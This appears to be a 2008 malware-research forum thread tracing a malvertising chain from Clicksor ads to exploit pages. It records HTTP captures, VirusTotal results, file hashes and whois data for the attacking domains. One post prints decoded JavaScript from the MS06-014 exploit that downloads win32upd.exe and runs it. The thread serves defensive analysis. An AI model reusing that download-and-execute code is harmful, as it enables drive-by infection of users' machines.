Help - Search - Members - Calendar
Full Version: win32upd.exe - banner.swf - flashba.pdf
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
Sep 19 2008, 01:45 AM
New incident involving Clicksor advertising ... are they really unable to check out from whom they accept advertisments or are they involved ?

At first sight, one *might* think that us.adstore5.com/col7/728x90_animated.swf was the culprit for the executable downloaded on my PC ... well it ain't.
IPB Image
The page at serv.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=1&sid=[removed] contains a small script in addition to the advertising link pointing at our 728x90_animated.swf as seen below.
IPB Image
Once the "parts" concatenated, we notice a reference to us.adstore5.com/col7/frame.settings. From there we are redirected to fx-tracker.com/pdfdoc/index.php?id=728
IPB Image
That page leads to an interesting js script containing a couple of exploits.
CODE
GET /pdfdoc/index.php?id=728 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://serv.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=1&[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: fx-tracker.com

HTTP/1.1 200 OK
Date: Thu, 18 Sep 2008 20:41:25 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.2.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 64
Connection: close
Content-Type: text/html; charset=windows-1251

<script src="js.php?sessid=e3b4eqW7UA2e227tCO3M4a70b1"></script>
IPB Image
The first part of the obfuscated code attempts to save & run win32upd.exe using the usual BD96C556-65A3-11D0-983A-00C04FC29E36 - Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)
Below is an exerpt of the decoded block.
CODE
var exfile = "pdff.php";
za_lu.open  ( "GET", exfile, false);
za_lu.send();
var ff_pp ="g";
ob_ola.type = 1;
ob_ola.open();
var ff_pp ="g";
var h_y_f = za_lu.responseBody;
ob_ola.Write( h_y_f);
var tss = "C:\\win32upd.exe";
ob_ola.SaveToFile(tss,2);
var ff_pp ="g";
ob_ola.close();
var ff_pp ="g";
ob_sa.ShellExecute(tss);
The second part consists of a malicious PDF file which exploits a known vulnerability in the Collab.collectEmailInfo function of Acrobat Reader’s Javascript engine (CVE-2007-5659) and a malicious flash file containing a redirect to ex2tracking.com/pdfdoc/pdff.php

<h4>
VirusTotal results
</h4>
File win32upd.exe received on 09.18.2008 23:30:46 (CET)
AhnLab-V3 2008.9.19.0 2008.09.18 -
AntiVir 7.8.1.34 2008.09.18 TR/Crypt.XPACK.Gen
Authentium 5.1.0.4 2008.09.18 -
Avast 4.8.1195.0 2008.09.18 -
AVG 8.0.0.161 2008.09.18 -
BitDefender 7.2 2008.09.18 -
CAT-QuickHeal 9.50 2008.09.17 -
ClamAV 0.93.1 2008.09.18 -
DrWeb 4.44.0.09170 2008.09.18 -
eSafe 7.0.17.0 2008.09.18 -
eTrust-Vet 31.6.6094 2008.09.18 -
Ewido 4.0 2008.09.18 -
F-Prot 4.4.4.56 2008.09.18 -
F-Secure 8.0.14332.0 2008.09.18 -
Fortinet 3.113.0.0 2008.09.18 -
GData 19 2008.09.18 -
Ikarus T3.1.1.34.0 2008.09.18 -
K7AntiVirus 7.10.461 2008.09.18 -
Kaspersky 7.0.0.125 2008.09.18 -
McAfee 5387 2008.09.18 -
Microsoft 1.3903 2008.09.18 TrojanDownloader:Win32/Small.IQ
NOD32v2 3453 2008.09.18 a variant of Win32/Kryptik.O
Norman 5.80.02 2008.09.18 -
Panda 9.0.0.4 2008.09.18 -
PCTools 4.4.2.0 2008.09.18 -
Prevx1 V2 2008.09.18 Cloaked Malware
Rising 20.62.32.00 2008.09.18 -
Sophos 4.33.0 2008.09.18 Mal/EncPk-CZ
Sunbelt 3.1.1647.1 2008.09.18 -
Symantec 10 2008.09.18 -
TheHacker 6.3.0.9.087 2008.09.18 -
TrendMicro 8.700.0.1004 2008.09.18 -
VBA32 3.12.8.5 2008.09.18 -
ViRobot 2008.9.18.1381 2008.09.18 -
VirusBuster 4.5.11.0 2008.09.18 -
Webwasher-Gateway 6.6.2 2008.09.18 Trojan.Crypt.XPACK.Gen

Additional information
File size: 31744 bytes
MD5...: 5f9ee250b6b7b25884a0eda9b1b64120
SHA1..: 9fc1ecb18936238ae9b8296b357737158fb9d694
SHA256: d526692d0d5604e691000f2b8b23d3a830a4c6bd3352317e4a52b9e5d038624e

Kaspersky: Trojan-Downloader.Win32.Small.admn
______________________________

File banner.swf received on 09.18.2008 23:26:34 (CET)
AhnLab-V3 2008.9.19.0 2008.09.18 -
AntiVir 7.8.1.34 2008.09.18 -
Authentium 5.1.0.4 2008.09.18 -
Avast 4.8.1195.0 2008.09.18 -
AVG 8.0.0.161 2008.09.18 -
BitDefender 7.2 2008.09.18 -
CAT-QuickHeal 9.50 2008.09.17 -
ClamAV 0.93.1 2008.09.18 -
DrWeb 4.44.0.09170 2008.09.18 -
eSafe 7.0.17.0 2008.09.18 -
eTrust-Vet 31.6.6094 2008.09.18 -
Ewido 4.0 2008.09.18 -
F-Prot 4.4.4.56 2008.09.18 -
F-Secure 8.0.14332.0 2008.09.18 -
Fortinet 3.113.0.0 2008.09.18 -
GData 19 2008.09.18 -
Ikarus T3.1.1.34.0 2008.09.18 -
K7AntiVirus 7.10.461 2008.09.18 -
Kaspersky 7.0.0.125 2008.09.18 -
McAfee 5387 2008.09.18 -
Microsoft 1.3903 2008.09.18 -
NOD32v2 3453 2008.09.18 -
Norman 5.80.02 2008.09.18 -
Panda 9.0.0.4 2008.09.18 -
PCTools 4.4.2.0 2008.09.18 -
Prevx1 V2 2008.09.18 -
Rising 20.62.32.00 2008.09.18 -
Sophos 4.33.0 2008.09.18 -
Sunbelt 3.1.1647.1 2008.09.18 -
Symantec 10 2008.09.18 -
TheHacker 6.3.0.9.087 2008.09.18 -
TrendMicro 8.700.0.1004 2008.09.18 -
VBA32 3.12.8.5 2008.09.18 -
ViRobot 2008.9.18.1381 2008.09.18 -
VirusBuster 4.5.11.0 2008.09.18 -
Webwasher-Gateway 6.6.2 2008.09.18 -

Additional information
File size: 10332 bytes
MD5...: ae8c94823a2a82af749088584ed11edd
SHA1..: 47610b05c4b15d84040a2a986c27bb3557797d34
SHA256: 3a5a0d00606e931d367db788e12e3855627124aa640197d62f6bc6259a431922

Redirect to ex2tracking.com/pdfdoc/pdff.php?0

Kaspersky: Exploit.SWF.Agent.e
______________________________

File flashba.pdf received on 09.19.2008 01:39:30 (CET)
AhnLab-V3 2008.9.19.0 2008.09.18 -
AntiVir 7.8.1.34 2008.09.18 -
Authentium 5.1.0.4 2008.09.19 -
Avast 4.8.1195.0 2008.09.18 -
AVG 8.0.0.161 2008.09.18 -
BitDefender 7.2 2008.09.19 -
CAT-QuickHeal 9.50 2008.09.17 -
ClamAV 0.93.1 2008.09.19 -
DrWeb 4.44.0.09170 2008.09.19 -
eSafe 7.0.17.0 2008.09.18 -
eTrust-Vet 31.6.6091 2008.09.16 -
Ewido 4.0 2008.09.18 -
F-Prot 4.4.4.56 2008.09.18 -
F-Secure 8.0.14332.0 2008.09.19 -
Fortinet 3.113.0.0 2008.09.18 -
GData 19 2008.09.19 -
Ikarus T3.1.1.34.0 2008.09.19 -
K7AntiVirus 7.10.461 2008.09.18 -
Kaspersky 7.0.0.125 2008.09.19 -
McAfee 5387 2008.09.18 -
Microsoft 1.3903 2008.09.19 -
NOD32v2 3453 2008.09.18 -
Norman 5.80.02 2008.09.18 -
Panda 9.0.0.4 2008.09.18 -
PCTools 4.4.2.0 2008.09.18 -
Prevx1 V2 2008.09.19 -
Rising 20.62.32.00 2008.09.18 -
Sophos 4.33.0 2008.09.19 -
Sunbelt 3.1.1647.1 2008.09.18 -
Symantec 10 2008.09.19 -
TheHacker 6.3.0.9.087 2008.09.18 -
TrendMicro 8.700.0.1004 2008.09.18 -
VBA32 3.12.8.5 2008.09.18 -
ViRobot 2008.9.18.1381 2008.09.18 -
VirusBuster 4.5.11.0 2008.09.18 -
Webwasher-Gateway 6.6.2 2008.09.18 -

Additional information
File size: 3455 bytes
MD5...: 52e22ae344f6ca994439cb9c525d5257
SHA1..: ce4644fc506a4edb3b1ed9e4584794bc9463406c
SHA256: e18fd500f6befeb94edb6f2cc0927f736bbbbc1c4a62028574bd68aa19fe0b70

Kaspersky: Exploit.Win32.Pidief.hf

Many thanks to wagdoll for reporting this issue.
Kimberly
Sep 26 2008, 06:05 PM
New domains, still coming through Clicksor advertising.

m2.petiads.com/krast5/468x60_krusty_stand.swf (clean)
IPB Image
m2.petiads.com/krast5/frame.settings
ya-tracker.com/pdfdoc/index.php?id=468
ya-tracker.com/pdfdoc/js.php?sessid=[removed]
ya-tracker.com/pdfdoc/pdff.php
ya-tracker.com/pdfdoc/pipo.php?session=[removed]
And ...
ya-tracker.com/pdfdoc/banner.swf containing a link to ya-tracker.com/pdfdoc/pdff.php?[removed]

ya-tracker.com/pdfdoc/flashba.pdf leading to ya-tracker.com/pdfdoc/pdff.php?[removed]
<h4>
Virus Total results
</h4>
File win32upd.exe received on 09.26.2008 19:43:26 (CET)
AntiVir 7.8.1.34 2008.09.26 -
Authentium 5.1.0.4 2008.09.26 -
Avast 4.8.1195.0 2008.09.26 -
AVG 8.0.0.161 2008.09.26 SHeur.CKPG
BitDefender 7.2 2008.09.26 -
CAT-QuickHeal 9.50 2008.09.26 TrojanDownloader.Agent.ahkm
ClamAV 0.93.1 2008.09.26 -
DrWeb 4.44.0.09170 2008.09.26 -
eSafe 7.0.17.0 2008.09.25 Win32.Agent.ahkm
eTrust-Vet 31.6.6110 2008.09.26 -
Ewido 4.0 2008.09.26 -
F-Prot 4.4.4.56 2008.09.25 -
F-Secure 8.0.14332.0 2008.09.26 Trojan-Downloader.Win32.Agent.ahkm
Fortinet 3.113.0.0 2008.09.26 PossibleThreat
GData 19 2008.09.26 -
Ikarus T3.1.1.34.0 2008.09.26 Trojan-Downloader.Win32.Agent.ahkm
K7AntiVirus 7.10.475 2008.09.26 -
Kaspersky 7.0.0.125 2008.09.26 Trojan-Downloader.Win32.Agent.ahkm
McAfee 5392 2008.09.25 -
Microsoft 1.3903 2008.09.26 TrojanDownloader:Win32/Small.IQ
NOD32 3474 2008.09.26 -
Norman 5.80.02 2008.09.26 -
Panda 9.0.0.4 2008.09.25 -
PCTools 4.4.2.0 2008.09.26 -
Prevx1 V2 2008.09.26 Cloaked Malware
Rising 20.63.42.00 2008.09.26 -
SecureWeb-Gateway 6.7.6 2008.09.26 -
Sophos 4.34.0 2008.09.26 -
Sunbelt 3.1.1668.1 2008.09.24 Trojan-Downloader.Win32.Agent.ahkm
Symantec 10 2008.09.26 Downloader
TheHacker 6.3.0.9.094 2008.09.25 -
TrendMicro 8.700.0.1004 2008.09.26 -
VBA32 3.12.8.6 2008.09.26 -
ViRobot 2008.9.26.1394 2008.09.26 Trojan.Win32.Downloader.30208.AF
VirusBuster 4.5.11.0 2008.09.26 -

Additional information
File size: 30208 bytes
MD5...: 0c688f2abd34a127ce1a21632fedadac
SHA1..: bc37dda5574e42cd3421168f5e435045c371f698
SHA256: 5ab774c9c111a3d875b68f47f9569633e32ab42023a63bc04975e59691c95282
PEiD..: -
______________________________

File banner.swf received on 09.26.2008 19:43:43 (CET)
AhnLab-V3 2008.9.25.0 2008.09.26 -
AntiVir 7.8.1.34 2008.09.26 -
Authentium 5.1.0.4 2008.09.26 -
Avast 4.8.1195.0 2008.09.26 -
AVG 8.0.0.161 2008.09.26 -
BitDefender 7.2 2008.09.26 -
CAT-QuickHeal 9.50 2008.09.26 -
ClamAV 0.93.1 2008.09.26 -
DrWeb 4.44.0.09170 2008.09.26 -
eSafe 7.0.17.0 2008.09.25 -
eTrust-Vet 31.6.6110 2008.09.26 -
Ewido 4.0 2008.09.26 -
F-Prot 4.4.4.56 2008.09.25 -
F-Secure 8.0.14332.0 2008.09.26 -
Fortinet 3.113.0.0 2008.09.26 -
GData 19 2008.09.26 -
Ikarus T3.1.1.34.0 2008.09.26 -
K7AntiVirus 7.10.475 2008.09.26 -
Kaspersky 7.0.0.125 2008.09.26 -
McAfee 5392 2008.09.25 -
Microsoft 1.3903 2008.09.26 -
NOD32 3474 2008.09.26 -
Norman 5.80.02 2008.09.26 -
Panda 9.0.0.4 2008.09.25 -
PCTools 4.4.2.0 2008.09.26 -
Prevx1 V2 2008.09.26 -
Rising 20.63.42.00 2008.09.26 -
SecureWeb-Gateway 6.7.6 2008.09.26 -
Sophos 4.34.0 2008.09.26 -
Sunbelt 3.1.1668.1 2008.09.24 -
Symantec 10 2008.09.26 -
TheHacker 6.3.0.9.094 2008.09.25 -
TrendMicro 8.700.0.1004 2008.09.26 -
VBA32 3.12.8.6 2008.09.26 -
ViRobot 2008.9.26.1394 2008.09.26 -
VirusBuster 4.5.11.0 2008.09.26 -

Additional information
File size: 10286 bytes
MD5...: 9e140b1c305157408cb6be144c85827e
SHA1..: 4f9fab0f48022cce1738eaf1e568f2d9c8e971a5
SHA256: add611dc725b27aff0739cc21f058b36eca2aca924728ed91d54f1cbc8a7658d
PEiD..: -
packers (Kaspersky): Swf2Swc
______________________________

File flashba.pdf received on 09.26.2008 19:44:15 (CET)
AhnLab-V3 2008.9.25.0 2008.09.26 -
AntiVir 7.8.1.34 2008.09.26 -
Authentium 5.1.0.4 2008.09.26 -
Avast 4.8.1195.0 2008.09.26 -
AVG 8.0.0.161 2008.09.26 -
BitDefender 7.2 2008.09.26 -
CAT-QuickHeal 9.50 2008.09.26 -
ClamAV 0.93.1 2008.09.26 -
DrWeb 4.44.0.09170 2008.09.26 -
eSafe 7.0.17.0 2008.09.25 -
eTrust-Vet 31.6.6110 2008.09.26 -
Ewido 4.0 2008.09.26 -
F-Prot 4.4.4.56 2008.09.25 -
F-Secure 8.0.14332.0 2008.09.26 -
Fortinet 3.113.0.0 2008.09.26 -
GData 19 2008.09.26 -
Ikarus T3.1.1.34.0 2008.09.26 -
K7AntiVirus 7.10.475 2008.09.26 -
Kaspersky 7.0.0.125 2008.09.26 -
McAfee 5392 2008.09.25 -
Microsoft 1.3903 2008.09.26 -
NOD32 3474 2008.09.26 -
Norman 5.80.02 2008.09.26 -
Panda 9.0.0.4 2008.09.25 -
PCTools 4.4.2.0 2008.09.26 -
Rising 20.63.42.00 2008.09.26 -
SecureWeb-Gateway 6.7.6 2008.09.26 -
Sophos 4.34.0 2008.09.26 -
Sunbelt 3.1.1668.1 2008.09.24 -
Symantec 10 2008.09.26 -
TheHacker 6.3.0.9.094 2008.09.25 -
TrendMicro 8.700.0.1004 2008.09.26 -
ViRobot 2008.9.26.1394 2008.09.26 -
VirusBuster 4.5.11.0 2008.09.26 -

Additional information
File size: 3484 bytes
MD5...: 971fe6e4686581c5e121775c74eb08f4
SHA1..: 041ceabea020bbfc926aaa1514939a5984538718
SHA256: 068066daa3fec52c0a5a35e8921f58d013453deb5a1fd09858ec22f20c543096
PEiD..: -

<h4>
IP details
</h4>
m2.petiads.com - 78.109.18.211

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-09-24
Expires: 2009-09-24
Updated: 2008-09-25
Name Server: NS0.DIRECTNIC.COM (has 351,330 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Location - Kyyiv - Kiev - Dp32a - Putev Alex
Dedicated Hosting: petiads.com is hosted on a dedicated server.

Whois Record
Registrant:
Sijan
3211 Bretu St.
Tartu, NA 52113
EE
238 443211x33
Fax:238 443211

Domain Name: PETIADS.COM

Administrative Contact:
Parum, Sijan
3211 Bretu St.
Tartu, NA 52113
EE
238 443211x33
Fax:238 443211
______________________________

ya-tracker.com - 78.109.20.34

Website Title: eXTReMe Tracking
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-09-24
Expires: 2009-09-24
Updated: 2008-09-25
Name Server: NS0.DIRECTNIC.COM (has 351,330 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Location - Ukraine - Dp32a2 - Viliam Pozner
Reverse IP: 2 other sites hosted on this server.

Whois Record
Registrant:
ya-tracker inc.
6321 Metreba line, 67,1
Barein, Zarepp 53312
TR
624 623411

Domain Name: YA-TRACKER.COM

Websites.
  1. fx-tracker.com
  2. ya-tracker.com
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.